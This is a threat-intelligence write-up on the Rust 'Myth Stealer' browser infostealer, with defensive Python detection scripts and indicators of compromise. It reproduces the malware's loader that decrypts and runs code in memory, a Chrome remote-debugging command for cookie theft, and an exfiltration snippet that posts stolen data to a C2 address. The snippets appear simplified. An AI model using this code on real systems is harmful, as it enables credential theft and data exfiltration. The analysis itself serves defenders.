Rust-Based ‘Myth Stealer’ Hits Chromium Browsers, Harvests Passwords & Cookies

A new and rapidly evolving malware threat, Myth Stealer, written entirely in Rust, is actively targeting users of Chromium-based browsers including Google Chrome, Microsoft Edge, Brave, and Opera alongside Gecko-based browsers like Firefox.

Discovered by Trellix Advanced Research Center, this infostealer employs novel evasion techniques and highly modular code to steal sensitive user data, including passwords, cookies, credit card details, and more.

Originally distributed as a free trial on Telegram in late 2024, Myth Stealer has since transformed into a paid subscription service, facilitating cybercrime at scale.

Technical Dissection: Evasion, Extraction, and Exfiltration

Loader and Fake Window Mechanism

Upon execution, Myth Stealer displays a convincing fake window, built with Rust GUI crates such as native-windows-gui, egui, or native_dialog, to trick users into believing a legitimate application is running.

Simultaneously, the loader decrypts the main stealer payload in memory using custom algorithms or cryptographic routines (XOR/AES, leveraging crates such as include-crypt). The decrypted payload is a 64-bit Rust DLL with key exports (DllMain and bz_internal_error), executed stealthily with the memexec crate.

Code Excerpt: Loader Decrypting and Executing DLL

```rust
use include_crypt::decrypt_aes;

let encrypted_bytes = include_bytes!("stealer_payload.aes");
let key = b"supersecretkey!"; // Key is hardcoded or obfuscated
let decrypted_payload = decrypt_aes(encrypted_bytes, key);
memexec::exec(&decrypted_payload); // Execute DLL in-memory
```

Anti-Analysis and Obfuscation

Myth Stealer uses the obfstr crate for string obfuscation, hindering static analysis and signature-based detection. For example, strings are XOR’d and resolved at runtime via custom functions. Sandboxing checks are performed by scanning for known forensic usernames and VM-related system files. If detected, the malware self-terminates, thwarting sandbox analysis.

Obfstr Deobfuscation Workflow (Reverse Engineering)

  • Locate calls to obfstr::xref::inner.
  • Extract operands and re-emulate the XOR/decryption logic.
  • Patch binary with recovered strings for rapid static analysis.

Data Harvesting: Passwords, Cookies, Clipboard

Myth Stealer targets a broad spectrum of browsers and apps:

  • Chromium browsers (Chrome, Edge, Opera, Brave, Vivaldi, etc.)
  • Gecko browsers (Firefox)
  • Discord and its variants

For Chromium, it leverages the browser’s remote debugging mode to extract cookies:

```text
chromium.exe --remote-debugging-port=9222 --user-data-dir=<victimdir> --headless
```
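The command line above is the detection opportunity: a Chromium browser launched with a debugging port, headless, pointed at the user's live profile and spawned by something other than the shell is a combination legitimate use rarely produces. The following is an added example (not code from the article or from Trellix) that scores process-creation events for that pattern; the event field names, the browser executable list and the sample events are constructed assumptions, so map them onto your own EDR or Sysmon telemetry.

```python
import re

# Assumed Windows executable names for the Chromium-family browsers the article lists.
CHROMIUM_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe",
                     "vivaldi.exe", "chromium.exe"}
DEBUG_FLAG = re.compile(r"--remote-debugging-(?:port|pipe)(?:=(\d+))?")
# A user-data-dir under AppData\Local is the user's real profile (where the cookies live);
# automation frameworks normally point at a throwaway directory instead.
REAL_PROFILE = re.compile(r'--user-data-dir="?[^"\s]*\\appdata\\local\\')

# Constructed process-creation events in Sysmon Event ID 1 style; not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Users\alice\AppData\Roaming\winlnk.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 '
                r'--user-data-dir="C:\Users\alice\AppData\Local\Google\Chrome\User Data" --headless'},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Program Files\nodejs\node.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=0 '
                r'--user-data-dir=C:\Temp\pptr-profile-1'},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: dict):
    """Return a finding when a Chromium browser starts with remote debugging enabled, else None."""
    if basename(ev["image"]) not in CHROMIUM_BROWSERS:
        return None
    m = DEBUG_FLAG.search(ev["cmdline"])
    if not m:
        return None
    cmd = ev["cmdline"].lower()
    reasons = ["remote debugging enabled (%s)" % (("port " + m.group(1)) if m.group(1) else "pipe")]
    score = 1
    if "--headless" in cmd:
        reasons.append("headless: no window for the user to notice")
        score += 1
    if REAL_PROFILE.search(cmd):
        reasons.append("user-data-dir points at the user's real profile")
        score += 2
    parent = basename(ev["parent"])
    if parent not in {"explorer.exe"} | CHROMIUM_BROWSERS:
        reasons.append(f"unusual parent process {parent}")
        score += 1
    severity = "high" if score >= 4 else "medium" if score >= 2 else "low"
    return {"severity": severity, "parent": parent, "reasons": reasons}


def hunt(events: list) -> list:
    """Run analyze_event over a batch and keep the index of each flagged event."""
    return [dict(index=i, **f) for i, ev in enumerate(events) if (f := analyze_event(ev))]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The third sample (a browser started by node.exe with a temporary profile) is deliberately left at medium: developer tooling such as Puppeteer produces exactly that shape, so the scoring separates it from the stealer's case, which combines a headless launch, the real profile and a parent dropped under AppData\Roaming.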

It also attempts to elevate privileges using the Windows API ShellExecuteW with the runas verb. Clipboard hijacking is implemented as well: cryptocurrency wallet addresses copied by the user are intercepted and replaced in flight, redirecting funds to attacker-controlled wallets.

Data Exfiltration and Persistence

Harvested data is packed into a zip file, reversed at the byte level, and sent via HTTP POST requests to a C2 server (example: 185[.]224[.]3[.]219:8080/api/send). Each request includes custom headers (myth-key/key), further shrouding communications.

Zip File Exfiltration Logic

```rust
use std::fs;

let mut zip_file = fs::read("harvested_data.zip")?;
zip_file.reverse(); // Simple byte reversal for obfuscation
let client = reqwest::blocking::Client::new();
let res = client.post("http://185.224.3.219:8080/api/send")
    .header("key", "unique-myth-key")
    .body(zip_file)
    .send()?;
```
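Byte reversal defeats a naive content inspector that looks for the ZIP magic at the start of a POST body, but it is trivially reversible, so a network sensor or proxy can simply check the body backwards. Added example, not code from the article or from Trellix: it builds a constructed stand-in for the harvested archive, detects the reversed form in a captured POST body, and recovers the member list. The header names are taken from the article; the archive contents are placeholders.

```python
import io
import zipfile

ZIP_LOCAL_MAGIC = b"PK\x03\x04"  # local file header: first bytes of a normal archive
ZIP_EOCD_MAGIC = b"PK\x05\x06"   # end-of-central-directory record: within the last 65557 bytes


def looks_like_reversed_zip(body: bytes) -> bool:
    """True when the body is a ZIP archive that has been byte-reversed before sending."""
    if len(body) < 22:  # an EOCD record alone is 22 bytes
        return False
    restored = body[::-1]
    return restored.startswith(ZIP_LOCAL_MAGIC) and ZIP_EOCD_MAGIC in restored[-65557:]


def recover_archive(body: bytes) -> list:
    """Undo the reversal and list the members, i.e. what the sample tried to exfiltrate."""
    with zipfile.ZipFile(io.BytesIO(body[::-1])) as archive:
        return archive.namelist()


def classify_post(headers: dict, body: bytes) -> list:
    """Reasons a captured HTTP POST matches the exfiltration pattern described in the article."""
    reasons = []
    lowered = {k.lower(): v for k, v in headers.items()}
    if "key" in lowered or "myth-key" in lowered:
        reasons.append("custom 'key'/'myth-key' request header")
    if looks_like_reversed_zip(body):
        reasons.append("POST body is a byte-reversed ZIP archive")
    elif body.startswith(ZIP_LOCAL_MAGIC):
        reasons.append("POST body is a plain ZIP archive")
    return reasons


def build_sample_archive() -> bytes:
    """Constructed stand-in for 'harvested_data.zip'; member contents are placeholders only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("passwords.txt", "placeholder, not real credentials\n")
        archive.writestr("cookies.txt", "placeholder\n")
    return buf.getvalue()


if __name__ == "__main__":
    wire_body = build_sample_archive()[::-1]  # what would appear on the wire
    print(classify_post({"key": "unique-myth-key", "Content-Type": "application/octet-stream"}, wire_body))
    print(recover_archive(wire_body))
```

The reversed check also catches the plain-ZIP case when the test order is swapped; keeping both lets the same rule track a future build that drops the reversal while still alerting on the header.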

Data points exfiltrated include:

  • Saved passwords, cookies, autofills, credit cards
  • Browser session tokens
  • Screenshots after fetching the external IP with a GET request to ipify.org

The malware maintains persistence by copying itself to AppData\Roaming\winlnk.exe and creating a .lnkk shortcut in the startup directory, registered via custom registry keys.

The Growing Threat: Rapid Adaptation and Defensive Measures

The developers behind Myth Stealer are running a well-organized operation, offering subscriptions via cryptocurrency and maintaining rapid update cycles to bypass antivirus solutions. Updates are announced via Telegram channels, while stolen credentials are traded in dark marketplaces.

Mitigation Recommendations:

  • Monitor for suspicious processes utilizing browser debugging ports.
  • Audit startup folders and registry for unauthorized executables and .lnkk entries.
  • Employ endpoint detection with behavioral analysis to catch in-memory and obfuscated threats.
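The second recommendation can be turned into a hunt directly from the persistence details given earlier: a copy named winlnk.exe under AppData\Roaming and a .lnkk file in the Startup folder (Windows only honours real .lnk shortcuts there, so the odd extension is itself an anomaly). The following is an added example, not code from the article or from Trellix; the Startup folder path and the demo directory layout are assumptions, and the registry keys the article mentions are not checked because it does not name them.

```python
import tempfile
from pathlib import Path

# Artefacts named in the article: the dropped copy and the Startup entry.
DROPPED_BINARY = "winlnk.exe"
# Assumed default per-user Startup folder, relative to %APPDATA% (Roaming).
STARTUP_REL = Path("Microsoft/Windows/Start Menu/Programs/Startup")
RUNNABLE_SUFFIXES = {".exe", ".bat", ".cmd", ".vbs", ".js", ".ps1"}


def hunt_persistence(roaming: Path) -> list:
    """Scan a Roaming profile directory for the article's persistence artefacts."""
    findings = []
    binary = roaming / DROPPED_BINARY
    if binary.is_file():
        findings.append({"path": str(binary), "reason": "winlnk.exe copied to AppData\\Roaming"})
    startup = roaming / STARTUP_REL
    if startup.is_dir():
        for entry in sorted(startup.iterdir()):
            suffix = entry.suffix.lower()
            if suffix == ".lnkk":
                findings.append({"path": str(entry),
                                 "reason": ".lnkk file in Startup (not a valid .lnk shortcut)"})
            elif suffix in RUNNABLE_SUFFIXES:
                findings.append({"path": str(entry),
                                 "reason": "script or executable dropped directly in Startup"})
    return findings


def build_demo_roaming(root: Path) -> Path:
    """Constructed %APPDATA% layout: one benign shortcut plus the two artefacts (demo only)."""
    startup = root / STARTUP_REL
    startup.mkdir(parents=True)
    (startup / "OneDrive.lnk").write_bytes(b"")
    (startup / "winlnk.lnkk").write_bytes(b"")
    (root / DROPPED_BINARY).write_bytes(b"MZ")  # placeholder, not a real executable
    return root


def run_demo() -> list:
    """Build the constructed layout in a temporary directory and return the flagged file names."""
    with tempfile.TemporaryDirectory() as tmp:
        findings = hunt_persistence(build_demo_roaming(Path(tmp)))
        return [Path(f["path"]).name for f in findings]


if __name__ == "__main__":
    for name in run_demo():
        print(name)
```

On a live Windows host, call hunt_persistence(Path(os.environ["APPDATA"])) for each user profile instead of the demo tree; the benign .lnk entry is skipped so routine Startup shortcuts do not generate noise.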

Myth Stealer exemplifies a new wave of Rust-based malware: robust, evasive, and modular—posing a formidable challenge for defenders across the globe. As browser threats escalate, proactive threat hunting and consistent user awareness remain essential.

Indicators of compromise

SHA256  Name
1847288195fcfc03fc186bf4eead4268048ef5e082dedb963b3450ee07c23883  loader.exe
65a84024daf30c12fd2e76db661bf6e85f3da30bb3aaa7e774152855d718b0c4  myth.exe
e5d09da6648add4776de8091b0182b935405791bf41476465b0e7dcb066fc0dc  myth.exe
f7cb6626e311181d9ded9536b1fbdf709b8254abd8d0810e04cebefea2fed131  Mythic Guardian.exe
acd66cb5f1447b803245c495400ad0886352920e35defcca6c45519fb7d33693  myth.exe
c7ae9d808e97fe6d6bf97aaf0775b9b6e68449f10bcc933bf07ba9d34d75a379  Pckr.exe
6c54e6648a6a33583d7707a9f7c5e83dd08ed481df6354c52e8f81e729d74a82  Myth-Voice-Changer.exe
7e2bed39eea850960a0d043e6e671154f413f5fe2cc7cafe6d92c903b3a2e8d1  build-213.exe (free trial version)
b180f6f9f7eb0bb1a12a7e7c8216499366419b1083c84c4af5b0ee69b3016186  krx ultimate crack 1.31.rar
0631a62a173833c7c821989e63f77632ecce30ca5a7049db4898ff0505abf32e  Krx Clinet.exe
Priya